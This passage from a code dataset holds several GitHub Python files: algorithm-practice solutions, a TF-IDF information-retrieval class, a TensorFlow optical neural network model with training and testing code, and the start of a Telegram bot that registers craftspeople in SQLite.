- 1 >= cleaner[1]:\n            board[x1][y1] = board[x1 - 1][y1]\n            x1 -= 1\n        elif x1 == cleaner[1] and y1 - 2 >= 0:\n            board[x1][y1] = board[x1][y1 - 1]\n            y1 -= 1\n    board[x1][y1] = 0\n\n\nfor _ in range(t):\n    confusion(board, r, c)\n    clean(board, r, c, cleaner)\nans = 0\nfor ele in board:\n    ans += sum(ele)\nprint(ans + 2)","repo_name":"112224/algorithm","sub_path":"python3/17144 미세먼지 안녕!.py","file_name":"17144 미세먼지 안녕!.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7565683398","text":"from SearchEngine import SearchEngine\nimport os\n\nfrom natsort import natsorted\nfrom config import Folder\nimport numpy as np\n\nimport pandas as pd\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\n\ndef checkTermInObject(term, obj, docId, calcNo):\n    if term in obj:\n        obj[term][0][docId + 1] = calcNo\n    else:\n        obj[term] = []\n        obj[term].append({})\n        obj[term][0][docId + 1] = calcNo\n\n\nclass TF_IDF:\n    se = SearchEngine()\n    folder = Folder()\n    docs = []\n    docID = 1\n    pos_index = se.pos_index\n\n    # Number of Docs => self.folder.numberOfDocs(self.folder.folder_names)\n    def getDocs(self):\n        for folder_name in self.folder.folder_names:\n            # # Open files.\n            file_names = natsorted(os.listdir(folder_name))\n            # For every file.\n            for file_name in file_names:\n                # Read file contents.\n                stuff = self.se.read_file(folder_name + '/' + file_name)\n                final_token_list = self.se.preprocessing(stuff)\n                self.docs.append(final_token_list)\n        return self.docs\n\n    def compute_weight_TF(self):\n        docs = self.getDocs()\n        tf = {}\n        docSize = []\n        for i in range(len(docs)):\n            docSize.append(len(docs[i]))\n\n        for term in self.pos_index:\n            for docId in range(self.folder.numberOfDocs(self.folder.folder_names)):\n\n                if self.pos_index[term][1].get(docId + 1) is not None:\n                    # term frequency TF => len(self.pos_index[term][1].get(docId + 1))\n                    tfNo = 1 + np.log10(len(self.pos_index[term][1].get(docId + 1)))\n                    # print(docSize[docId])\n                    checkTermInObject(term, tf, docId, round(tfNo, 5))\n\n                else:\n                    checkTermInObject(term, tf, docId, 0)\n        return tf\n\n    def computeIDF(self):\n        idf = {}\n        for term in self.pos_index:\n            if self.pos_index[term][1] is not None:\n                # DF for a term = self.pos_index[term][0]\n                n = np.log10(self.folder.numberOfDocs(self.folder.folder_names) / self.computeDF(term))\n                idf[term] = round(n, 5)\n\n        return idf\n\n    def computeDF(self, term):\n        return self.pos_index[term][0]\n\n    def 
computeTFIDF_weight(self, tf, idf):\n tfIdf = {}\n for term in tf:\n for docId in range(self.folder.numberOfDocs(self.folder.folder_names)):\n tfIdfNo = tf[term][0].get(docId + 1) * idf[term]\n checkTermInObject(term, tfIdf, docId, round(tfIdfNo, 5))\n\n return tfIdf\n\n def normalized_tfidf(self, tf_idf, document_length):\n normalized_tf_idf = {}\n docs_length = list(document_length.values())\n for i in range(len(docs_length)):\n for term in tf_idf:\n n_tfidf = tf_idf[term][0].get(i + 1) / docs_length[i]\n checkTermInObject(term, normalized_tf_idf, i, round(n_tfidf, 5))\n\n return normalized_tf_idf\n\n def tf_format(self, tf):\n terms_list = list(tf.keys())\n tfNo = []\n for term in terms_list:\n tfNo.append(list(tf[term][0].values()))\n\n df = pd.DataFrame(tfNo, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n\n def idf_format(self, idf):\n terms_list = list(idf.keys())\n tfNo = []\n dfTerms = []\n for term in terms_list:\n tfNo.append(idf[term])\n dfTerms.append(self.computeDF(term))\n\n data = {'Term ': terms_list, ' df ': dfTerms, ' IDF ': tfNo}\n df = pd.DataFrame(data, columns=['Term ', ' df ', ' IDF '])\n print(df)\n\n def tf_idf_format(self, tfIDF):\n terms_list = list(tfIDF.keys())\n tf_idf = []\n for term in terms_list:\n tf_idf.append(list(tfIDF[term][0].values()))\n\n df = pd.DataFrame(tf_idf, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n\n def normalized_tf_idf_format(self, normalized_tfidf):\n terms_list = list(normalized_tfidf.keys())\n n_tf_idf = []\n for term in terms_list:\n n_tf_idf.append((list(normalized_tfidf[term][0].values())))\n print(n_tf_idf)\n\n df = pd.DataFrame(n_tf_idf, columns=self.folder.fileNames(self.folder.folder_names), index=terms_list)\n print(df)\n","repo_name":"Mostafa54225/Information-Retrieval","sub_path":"TF_IDF.py","file_name":"TF_IDF.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16413709312","text":"from project_defs import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass CustomModel():\r\n def __init__(self,\r\n model_name,\r\n inputs_path,\r\n targets_path,\r\n test_inputs_path,\r\n test_lables_path,\r\n num_of_samples,\r\n num_of_layers,\r\n layers_distance_pxls,\r\n wavelen_in_pxls,\r\n nm,\r\n learning_rate,\r\n batch_size,\r\n epochs,\r\n dir_to_save,\r\n name_to_save,\r\n weights_name,\r\n prop_input = True,\r\n rescaling_factor = None,\r\n padding_factor = None,\r\n amp_modulation = False,\r\n phase_modulation = False,\r\n force_shape = None,\r\n **kwargs):\r\n\r\n self.model_name = model_name\r\n self.inputs_path = inputs_path\r\n self.targets_path = targets_path\r\n self.test_inputs_path = test_inputs_path\r\n self.test_labels_path = test_lables_path\r\n self.num_of_samples = num_of_samples\r\n self.inputs = None\r\n self.targets = None\r\n self.tests_inputs = None\r\n self.test_targets_labels = None\r\n self.num_of_layers = num_of_layers\r\n self.z = layers_distance_pxls\r\n self.wavelen = wavelen_in_pxls\r\n self.amp_mod = amp_modulation\r\n self.phase_mod = phase_modulation\r\n self.rescaling_f = rescaling_factor\r\n self.padding_f = padding_factor\r\n self.nm = nm\r\n self.lr = learning_rate\r\n self.batch_size = batch_size\r\n self.epochs = epochs\r\n self.prop_input = prop_input\r\n self.padz = 0\r\n self.padding = None\r\n self.shape = None\r\n self.layers = []\r\n self.weights = []\r\n self.model = None\r\n self.dir_to_save = 
dir_to_save\r\n self.name_to_save = name_to_save\r\n self.weights_name = weights_name\r\n\r\n self.force_shape = force_shape\r\n self.running_model = False\r\n\r\n\r\n self.printHeader()\r\n print(\"**** Processing Parameters ****\\n\")\r\n self.processParams()\r\n print(\"**** Finished Processing Parameters ****\\n\")\r\n print(\"**** Building Model ****\")\r\n self.buildModel()\r\n print(\"**** Finished Building Model ****\\n\")\r\n # print(\"**** Training Model ****\")\r\n # self.trainModel()\r\n # print(\"**** Finished Training Model ****\")\r\n\r\n\r\n def processParams(self):\r\n print(\"---- processing model parameters ----\\n\")\r\n if \"ubyte\" in self.inputs_path:\r\n self.inputs = idx2numpy.convert_from_file(self.inputs_path)[:self.num_of_samples] / 255\r\n self.targets= idx2numpy.convert_from_file(self.targets_path)[:self.num_of_samples]\r\n self.tests_inputs = idx2numpy.convert_from_file(self.test_inputs_path) / 255\r\n self.test_targets_labels = idx2numpy.convert_from_file(self.test_labels_path) ## note\r\n # - these are the labels only! need to convert to 2D\r\n\r\n else:\r\n print(\"---- ERROR: currently not supporting input files type!! ----\")\r\n exit(FAILURE)\r\n\r\n assert self.epochs > 0, \"number of epochs should be > 0\"\r\n assert len(self.inputs.shape) >= 3\r\n shape_1d = (self.inputs.shape)[1]\r\n\r\n if (self.force_shape != None): # FIXME: currntly the force shape is the only way to give\r\n # the system the right shape\r\n shape_1d = self.force_shape\r\n\r\n if self.rescaling_f != None:\r\n shape_1d *= self.rescaling_f\r\n\r\n if self.padding_f != None:\r\n self.padz = math.floor(shape_1d*self.padding_f)\r\n shape_1d += self.padz\r\n assert len(self.inputs.shape) == 3, \"shape of input (4D?) is not yet supported\"\r\n self.padding = [[0,0], [self.padz, self.padz], [self.padz, self.padz]]\r\n\r\n self.shape = (shape_1d, shape_1d)\r\n print(\"---- model shape after processing is : {} ----\".format(self.shape))\r\n\r\n line = \"model : {}\\nshape : {}\\nlearning_rate : {}\\nZ :{}\\nlambda :{}\\n\" \\\r\n \"input prop : {}\\n# of layers_{}_phase_mode_{}_amp_mod_{}\".format(\r\n self.model_name,\r\n self.shape,\r\n self.lr,\r\n self.z,\r\n self.wavelen,\r\n self.prop_input,\r\n self.num_of_layers,\r\n self.phase_mod,\r\n self.amp_mod)\r\n # print(line)\r\n\r\n self.weight_path = \"model_{}_phase_modulate_{}_amp_modulate_{}_shape_{}_learning_rate_{}_Z_{}_lambda_{}_input prop{}_#_of_layers_{}\".format(self.model_name,\r\n self.phase_mod,\r\n self.amp_mod,\r\n self.shape,\r\n self.lr,\r\n self.z,\r\n self.wavelen,\r\n self.prop_input,\r\n self.num_of_layers)\r\n\r\n\r\n def buildModel(self):\r\n ## build layers ##\r\n print(\"**** Make sure you did: pip install -q pyyaml h5py ****\")\r\n for i in range(self.num_of_layers):\r\n layer = project_layers.ModularLayer(\"layer : {}\".format(i),\r\n self.z,\r\n self.shape,\r\n self.wavelen,\r\n self.nm,\r\n self.amp_mod,\r\n self.phase_mod)\r\n\r\n\r\n self.layers.append(layer)\r\n print(\"---- model has {} layers ----\".format(len(self.layers)))\r\n\r\n prop_layer = project_layers.PropLayer(\"prop_layer\", self.z, self.shape, self.wavelen,\r\n self.nm)\r\n\r\n output_layer = project_layers.output_layer\r\n\r\n model = tf.keras.models.Sequential()\r\n if self.prop_input:\r\n model.add(prop_layer)\r\n model.add(tf.keras.layers.Flatten())\r\n\r\n for i in range(self.num_of_layers):\r\n model.add(self.layers[i])\r\n model.add(tf.keras.layers.Flatten())\r\n\r\n model.add(output_layer)\r\n\r\n model.compile(\r\n 
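            # Adam with the constructor's learning rate; pixel-wise MSE because the flattened 2D target maps are regressed directly\r\n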
tf.keras.optimizers.Adam(lr=self.lr, beta_1=0.9, beta_2=0.999, epsilon=1e-07),\r\n loss=tf.keras.losses.mse, metrics=['mae', 'mse']\r\n )\r\n # assert self.model == None, \"---- ERROR : model already exists! ----\"\r\n self.running_model = True\r\n self.model = model\r\n\r\n\r\n def trainModel(self,\r\n local_training_set = True,\r\n tf_dataset_name = None):\r\n\r\n print(\"**** Training Model ****\")\r\n model = self.model\r\n\r\n if (local_training_set == False):\r\n\r\n assert tf_dataset_name != None, \"please give a tf_dataset name as an argument\"\r\n\r\n ds, info = tfds.load(tf_dataset_name, split='train', shuffle_files=True, with_info=True)\r\n print(\"**** Model Info ****\")\r\n print(info)\r\n num_of_examples = int (info.splits[\"train\"].num_examples)\r\n for_loops_num = num_of_examples//self.batch_size\r\n\r\n for epoch in self.epochs:\r\n print(\"Start Epoch num {}\".format(epoch))\r\n\r\n ds = ds.shuffle(num_of_examples).batch(self.batch_size).prefetch(tf.data.experimental.AUTOTUNE)\r\n for i in (range(for_loops_num)):\r\n\r\n if (i % 100 == 0):\r\n print(\"train number : {}\".format(i))\r\n\r\n for example in ds.take(1):\r\n # covert inputs to grey scale and targets labels to 2D labels\r\n input_batch, target_batch = project_utils.make_inputs_targets_batch(example)\r\n\r\n if ((i % (for_loops_num // 10)) == 0):\r\n print(\"step #{} out of {}\".format(i, for_loops_num))\r\n\r\n\r\n print(\"fitting input\")\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n print(\"fitting target\")\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! ----\"\r\n # print(\"input batch shape: {}, target shape: {}\".format(input_batch.shape,\r\n # target_batch.shape))\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n target_batch = tf.reshape(target_batch,(self.batch_size,\r\n target_batch.shape[1]*target_batch.shape[2]))\r\n\r\n print(\"training\")\r\n model.fit(input_batch, target_batch, epochs=1, use_multiprocessing=True, verbose=0)\r\n\r\n else:\r\n new_inp_size = self.num_of_samples//self.batch_size\r\n for e in range(self.epochs):\r\n\r\n print(\"Epoch num #{} ot out {}\".format(e + 1, self.epochs))\r\n for i in range(new_inp_size):\r\n\r\n ## print what step were in\r\n if ((i % (new_inp_size // 10)) == 0):\r\n print(\"step #{} out of {}\".format(i, new_inp_size))\r\n\r\n ## process input/target batch ##\r\n input_batch = tf.cast(self.inputs[i:i + self.batch_size], tf.float32)\r\n target_batch = tf.cast(self.targets[i:i + self.batch_size], tf.float32)\r\n\r\n # target_batch = tf.reshape(target_batch,\r\n # (self.batch_size, self.shape[0], self.shape[1]))\r\n\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! 
----\"\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n target_batch = tf.reshape(target_batch,(self.batch_size,\r\n target_batch.shape[1]*target_batch.shape[2]))\r\n\r\n model.fit(input_batch, target_batch, epochs=1, use_multiprocessing=True, verbose=0)\r\n\r\n\r\n ## after training finished\r\n print(model.summary())\r\n self.model = model\r\n\r\n ## TODO - fix saveing model!!!\r\n # model.save(self.dir_to_save + '/' + self.name_to_save)\r\n model.save(\"{}/{}\".format(self.dir_to_save,self.model_name))\r\n model.save_weights(\"{}/{}/\".format(self.dir_to_save, self.model_name))\r\n\r\n print(\"*** Finished training - saved weights @ {} ***\".format(self.dir_to_save +'/'+self.weights_name))\r\n\r\n\r\n def rebuildModel(self, dir_to_save, model_name, input_shape):\r\n \"\"\"\r\n This function gets a path for a JSON file, desribing a model, an rebuild it before\r\n testing the model\r\n :return:\r\n \"\"\"\r\n # TODO: for now input_shape must be forced via arguemt, next step is to save it with a\r\n # JSON representaion of the network in the same dir as the weights, then pre-load that\r\n # JSON file to get all the relevant data in ordder to load the weights propely\r\n try:\r\n custom_objects = {\"output_func\": project_layers.output_func,\r\n \"output_layer\": project_layers.output_layer,\r\n \"my_fft_prop\": project_prop.my_fft_prop,\r\n \"ModularLayer\": project_layers.ModularLayer}\r\n\r\n self.model = tf.keras.models.load_model(\"{}/{}/\".format(dir_to_save,model_name),\r\n custom_objects = custom_objects)\r\n print(\"**** Full model loaded ****\")\r\n except:\r\n self.model.build(input_shape = (None, ) + input_shape)\r\n self.model.load_weights(\"{}/{}/\".format(dir_to_save,model_name))\r\n print(\"**** Weights Loaded ****\")\r\n\r\n\r\n def testModel(self,\r\n test_low_idx,\r\n test_high_idx,\r\n num_of_samples_to_tests,\r\n numeric_targets,\r\n local_training_set,\r\n tf_dataset_name = None,\r\n inputs_test_set = None,\r\n monte_carlo = False,\r\n monte_carlo_variance = None,\r\n input_shift = False,\r\n input_shift_percentrage = None\r\n ):\r\n\r\n \"\"\"\r\n\r\n :param test_low_idx: min for random index\r\n :param test_high_idx: max for random index\r\n :param num_of_samples_to_tests: number of samples\r\n :param numeric_targets: path to the array with the labels as numeric values\r\n :param inputs_test_set: path to the 2D test set\r\n :return:\r\n \"\"\"\r\n if self.running_model == False:\r\n print(\"ERROR: cannot test model, 'running_model' if False\")\r\n exit(FAILURE)\r\n\r\n assert (self.model != None), \"Model cannot be None when testing!\"\r\n # get truth table\r\n TT = project_utils.Truth_table()\r\n TT.clear()\r\n\r\n # # assert (local_training_set == False and tf_dataset_name != None), \"If dataset is not \" \\\r\n # \"local, tf_dataset_name arg should be != None\"\r\n\r\n true_count = 0\r\n flase_count = 0\r\n\r\n\r\n # Deal with tf_datasets:\r\n if (tf_dataset_name != None and local_training_set == False):\r\n ds, info = tfds.load(tf_dataset_name, split='test', shuffle_files=True, with_info=True)\r\n num_of_samples = int (info.splits[\"test\"].num_examples)\r\n\r\n if monte_carlo == True:\r\n test_model = self.monteCarlo(monte_carlo_variance)\r\n else:\r\n test_model = self.model\r\n\r\n ds = ds.shuffle(num_of_samples).batch(1).prefetch(tf.data.experimental.AUTOTUNE)\r\n count = 0\r\n for i in range(num_of_samples_to_tests):\r\n\r\n for example in ds.take(1):\r\n input_batch, 
target_batch = project_utils.make_inputs_targets_batch(example)\r\n expected = example[\"label\"].numpy()[0]\r\n # print(expected)\r\n # print(example)\r\n # print(example[\"label\"].numpy)\r\n\r\n inp_shape = input_batch.shape\r\n if len(inp_shape) == 2:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], 1)\r\n if len(inp_shape) == 3:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], inp_shape[2])\r\n\r\n\r\n if self.rescaling_f > 0:\r\n input_batch = project_utils.rescale_batch(input_batch,\r\n input_batch.shape[1]*\r\n self.rescaling_f,\r\n input_shift,\r\n input_shift_percentrage)\r\n\r\n if self.padding_f > 0:\r\n input_batch = tf.pad(input_batch, self.padding)\r\n\r\n if (target_batch.shape != input_batch.shape):\r\n target_batch = project_utils.rescale_batch(target_batch, input_batch.shape[1])\r\n\r\n assert (target_batch.shape == input_batch.shape), \"---- input batch shape != \" \\\r\n \"targets \" \\\r\n \"shape! ----\"\r\n\r\n input_batch = tf.cast(input_batch, tf.complex128)\r\n\r\n ## note - reshaping targets like so only right for 3D targets !##\r\n # target_batch = tf.reshape(target_batch,(self.batch_size,\r\n # target_batch.shape[1]*target_batch.shape[2]))\r\n # if self.rescaling_f > 0:\r\n # inp = tf.image.resize_with_pad(tf.reshape(input_batch, inp_shape), self.shape[0],\r\n # self.shape[1])\r\n #\r\n # if self.padding_f > 0:\r\n # inp = tf.pad(inp, self.padding)\r\n #\r\n # target = tf.image.resize_with_pad(tf.reshape(target_batch, inp_shape), self.shape[0],\r\n # self.shape[1])\r\n #\r\n # inp = tf.reshape(inp, (1, self.shape[0], self.shape[1]))\r\n # target = tf.reshape(target, (self.shape[0], self.shape[1]))\r\n #\r\n # inp = tf.cast(inp, tf.complex128)\r\n # assign Monte Carlo model or the clean model\r\n\r\n y = test_model.predict(input_batch)\r\n\r\n WIDTH, HEIGHT = self.shape\r\n\r\n if (project_utils.compare_imgs(tf.reshape(target_batch, (WIDTH, HEIGHT)),\r\n tf.reshape(y, (WIDTH, HEIGHT)),\r\n 0.3) == True):\r\n # TT.add_true(numeric_targets[idx]) // TODO - uncomment and debug\r\n print(\"TRUE\")\r\n # plt.subplot(311)\r\n # plt.imshow(tf.abs(tf.reshape(input_batch, (WIDTH, HEIGHT))))\r\n # plt.subplot(312)\r\n # plt.imshow(tf.reshape(target_batch, (WIDTH, HEIGHT)))\r\n # plt.subplot(313)\r\n # project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n # project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n # plt.show()\r\n true_count+=1\r\n TT.add_true(expected)\r\n\r\n else:\r\n print(\"FALSE\")\r\n plt.subplot(311)\r\n plt.imshow(tf.abs(tf.reshape(input_batch, (WIDTH, HEIGHT))))\r\n plt.subplot(312)\r\n plt.imshow(tf.reshape(target_batch, (WIDTH, HEIGHT)))\r\n plt.subplot(313)\r\n project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n plt.show()\r\n flase_count+=1\r\n actual_label = project_utils.result_to_label(project_utils.find_max_area(\r\n y.reshape(HEIGHT, WIDTH))[1], y.reshape(HEIGHT, WIDTH))\r\n\r\n print(\"expected label: {}, got label: {}\".format(expected, actual_label))\r\n TT.add_false(expected, actual_label)\r\n\r\n count += 1\r\n\r\n # print(\"# of True: \", TT.trues)\r\n # print(\"# of False: \", TT.falses)\r\n\r\n print(\"Total # of True: \", true_count)\r\n print(\"Total # of False: \", flase_count)\r\n TT.print_table(\"Mnist\", \"Got\", \"Expected\")\r\n\r\n else:\r\n #create a list of indexes for tests\r\n test_idx_list = np.random.randint(test_low_idx, test_high_idx, num_of_samples_to_tests)\r\n\r\n # assign Monte Carlo model or the clean model\r\n if monte_carlo 
== True:\r\n test_model = self.monteCarlo(monte_carlo_variance)\r\n else:\r\n test_model = self.model\r\n\r\n count = 1\r\n for idx in test_idx_list:\r\n print(\"running test #{} out of #{}, with idx = {}\".format(count,\r\n num_of_samples_to_tests, idx))\r\n\r\n # TODO - update this work with other inputs\r\n if (inputs_test_set != None):\r\n inp = self.tests_inputs[idx]\r\n assert (len(inp.shape) == 2)\r\n target = project_utils.make_2D_label(self.test_targets_labels[idx], inp.shape)\r\n expected = self.test_targets_labels[idx]\r\n\r\n else:\r\n inp = self.inputs[idx]\r\n target = self.targets[idx]\r\n\r\n # deal with rescaling\r\n if (input_shift):\r\n inp = project_utils.shift_pic_rand(inp, input_shift_percentrage, True)\r\n\r\n inp_shape = inp.shape\r\n if len(inp_shape) == 2:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], 1)\r\n if len(inp_shape) == 3:\r\n inp_shape = (1, inp_shape[0], inp_shape[1], inp_shape[2])\r\n\r\n if self.rescaling_f > 0:\r\n inp = tf.image.resize_with_pad(tf.reshape(inp, inp_shape),self.shape[0],\r\n self.shape[1])\r\n\r\n if self.padding_f > 0:\r\n inp = tf.pad(inp, self.padding)\r\n\r\n\r\n target = tf.image.resize_with_pad(tf.reshape(target, inp_shape), self.shape[0],\r\n self.shape[1])\r\n\r\n inp = tf.reshape(inp, (1, self.shape[0], self.shape[1]))\r\n target = tf.reshape(target, (self.shape[0], self.shape[1]))\r\n\r\n inp = tf.cast(inp, tf.complex128)\r\n\r\n\r\n y = test_model.predict(inp)\r\n\r\n WIDTH, HEIGHT = self.shape\r\n\r\n if (project_utils.compare_imgs(tf.reshape(target, (WIDTH, HEIGHT)),\r\n tf.reshape(y, (WIDTH, HEIGHT)),\r\n 0.3) == True):\r\n # TT.add_true(numeric_targets[idx]) // TODO - uncomment and debug\r\n print(\"TRUE\")\r\n true_count += 1\r\n TT.add_true(expected)\r\n else:\r\n print(\"FALSE\")\r\n plt.subplot(311)\r\n plt.imshow(tf.abs(tf.reshape(inp, (WIDTH, HEIGHT))))\r\n plt.subplot(312)\r\n plt.imshow(tf.reshape(target, (WIDTH, HEIGHT)))\r\n plt.subplot(313)\r\n project_utils.show_max_area(tf.reshape(y, (WIDTH, HEIGHT)))\r\n project_utils.show_max_area((y.reshape(WIDTH, HEIGHT)))\r\n plt.show()\r\n flase_count += 1\r\n actual_label = project_utils.result_to_label(project_utils.find_max_area(\r\n y.reshape(HEIGHT, WIDTH))[1], y.reshape(HEIGHT, WIDTH))\r\n\r\n print(\"expected label: {}, got label: {}\".format(expected, actual_label))\r\n TT.add_false(expected, actual_label)\r\n\r\n count+=1\r\n\r\n # print(\"# of True: \", TT.trues)\r\n # print(\"# of False: \", TT.falses)\r\n\r\n print(\"Total # of True: \", TT.trues)\r\n print(\"Total # of False: \", TT.falses)\r\n TT.print_table(\"Mnist\", \"Got\", \"Expected\")\r\n\r\n\r\n\r\n def printHeader(self):\r\n print(header.format(self.model_name, self.num_of_layers, self.z,\r\n self.wavelen, self.nm))\r\n\r\n def monteCarlo(self, variance):\r\n\r\n assert (variance < 1), \"Variance should be < 1 (in %)\"\r\n\r\n assert (self.model != None), \"Model cannot be None!\"\r\n\r\n monte_carlo_model = self.model\r\n\r\n for i in range(len(monte_carlo_model.layers)):\r\n weights = monte_carlo_model.layers[i].get_weights()\r\n num_of_weights = len(weights)\r\n\r\n if (num_of_weights > 0):\r\n for w in range(num_of_weights):\r\n weights[w] *= (1 + np.random.uniform(0, variance, weights[w].shape))\r\n monte_carlo_model.layers[i].set_weights(weights)\r\n return 
monte_carlo_model","repo_name":"avshalomn/project_custom_models","sub_path":"project_model.py","file_name":"project_model.py","file_ext":"py","file_size_in_byte":26234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14793702732","text":"class Solution:\n def simplifyPath(self, path):\n \"\"\"\n :type path: str\n :rtype: str\n \"\"\"\n docs = [x for x in path.split('/') if x != '.' and x != '']\n res = []\n for i in docs:\n if i == '..':\n if res:\n res.pop()\n else:\n res.append(i)\n re = '/' + '/'.join(res)\n return re\n\nobj = Solution()\nprint(obj.simplifyPath(\"/a//b////c/d//././/..\"))","repo_name":"smileshy777/practice","sub_path":"string_/Simplify_Path.py","file_name":"Simplify_Path.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69959495593","text":"n = int(input())\r\nnum = list(map(int, input().split()))\r\n# 0 1 1 3 2 \r\n\r\n# 4 2 5 3 1\r\n\r\nlst = []\r\n\r\nfor i in range(n):\r\n lst.insert(num[i], i+1)\r\nprint(*list(reversed(lst)))","repo_name":"kanghaeven/Algorithm","sub_path":"백준/Bronze/2605. 줄 세우기/줄 세우기.py","file_name":"줄 세우기.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2549968490","text":"__author__ = 'ArkJzzz (arkjzzz@gmail.com)'\n\nimport os\nimport logging\nimport sqlite3\nimport textwrap\nimport phonenumbers\nimport traceback\nimport html\nimport json\n\nfrom dotenv import load_dotenv\nfrom telegram import ParseMode\nfrom telegram import Update\nfrom telegram.ext import Filters\nfrom telegram.ext import Updater\nfrom telegram.ext import CallbackContext\nfrom telegram.ext import CallbackQueryHandler\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import MessageHandler\nfrom telegram.ext import PreCheckoutQueryHandler\n\n\n\nimport keyboards\nimport messages\nimport sqlite_helpers\n\nfrom pprint import pprint\n\n\nlogger = logging.getLogger('masters_bot')\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef handle_users_reply(update, context):\n pprint(context.user_data)\n if update.message:\n chat_id = update.message.chat_id\n user_reply = update.message.text\n elif update.callback_query:\n chat_id = update.callback_query.message.chat_id\n user_reply = update.callback_query.data\n else:\n return\n\n context.user_data['telegram_id'] = chat_id\n\n if user_reply == '/start':\n master_state = 'START'\n else:\n master_state = sqlite_helpers.get_master_state(chat_id)\n\n logger.debug(f'user_reply: {user_reply}')\n logger.debug(f'master_state: {master_state}')\n \n states_functions = {\n 'START': start,\n 'MASTER_REGISTRATION': master_registration_handler,\n 'MASTER_NAME_WAITING': save_master_name,\n 'TG_USERNAME_WAITING': save_tg_username,\n 'EMAIL_WAITING': save_email,\n 'PHONE_WAITING': save_phone,\n 'SOCIAL_WAITING': save_social,\n 'SELECT_CATEGORIES': select_categories,\n 'SELECT_SPECIALIZATIONS': select_specializations,\n 'SELECT_IS_ONLINE': select_is_online,\n 'SELECT_REGION': select_region,\n 'SELECT_PROVINCES': select_provinces,\n 'CITIES_WAITING': save_cities,\n 'SELECT_IS_HOUSE_CALL': select_is_house_call,\n 'SELECT_IS_FIND_JOB': select_find_job,\n 'OTHER_INFO': other_info,\n 'SHOW_MASTER_PAGE': show_master_page,\n }\n\n state_handler = states_functions[master_state]\n next_state = state_handler(update, context)\n logger.debug('next_state: {}'.format(next_state))\n 
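    # persist the handler's returned state so the next update is routed to the right function\n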
sqlite_helpers.set_master_state(chat_id, next_state)\n\n\ndef error_handler(update: object, context: CallbackContext):\n message = f'''\\\n Exception while handling an update:\n {context.error}\n '''\n logger.error(message, exc_info=context.error)\n tb_list = traceback.format_exception(None, context.error, context.error.__traceback__)\n tb_string = ''.join(tb_list)\n\n update_str = update.to_dict() if isinstance(update, Update) else str(update)\n message = (\n f'An exception was raised while handling an update\\n'\n f'
<pre>update = {html.escape(json.dumps(update_str, indent=2, ensure_ascii=False))}'\n        '</pre>\\n\\n'\n        f'<pre>context.chat_data = {html.escape(str(context.chat_data))}</pre>\\n\\n'\n        f'<pre>context.user_data = {html.escape(str(context.user_data))}</pre>\\n\\n'\n        f'<pre>{html.escape(tb_string)}</pre>
'\n )\n\n context.bot.send_message(\n chat_id=os.getenv('ADMIN_CHAT_ID'), \n text=message,\n parse_mode=ParseMode.HTML,\n )\n\n\ndef send_confirmation_message(update, context):\n sent_message = update.message.reply_text(\n text=textwrap.dedent(f'Вы ввели \\n{update.message.text}'),\n reply_markup=keyboards.get_confirm_keyboard(),\n )\n if context.user_data.get('message_to_del_id'):\n context.bot.delete_message(\n chat_id=update.message.chat_id,\n message_id=context.user_data['message_to_del_id']\n )\n context.user_data['message_to_del_id'] = sent_message.message_id\n logger.debug(context.user_data)\n\n\ndef send_message(update, context, text, keyboard=None):\n if update.callback_query:\n message = update.callback_query.message\n else:\n message = update.message\n sent_message = message.reply_text(\n text=textwrap.dedent(text),\n reply_markup=keyboard,\n )\n if context.user_data.get('message_to_del_id'):\n context.bot.delete_message(\n chat_id=message.chat_id,\n message_id=context.user_data['message_to_del_id']\n )\n context.user_data['message_to_del_id'] = sent_message.message_id\n logger.debug(context.user_data)\n\n\ndef start(update, context):\n user = update.message.from_user\n\n context.user_data['category_id'] = ''\n context.user_data['e_mail'] = ''\n context.user_data['fullname'] = ''\n context.user_data['social'] = ''\n context.user_data['other_info'] = ''\n context.user_data['phone_number'] = ''\n context.user_data['region_id'] = ''\n context.user_data['telegram_id'] = user.id\n context.user_data['telegram_username'] = ''\n 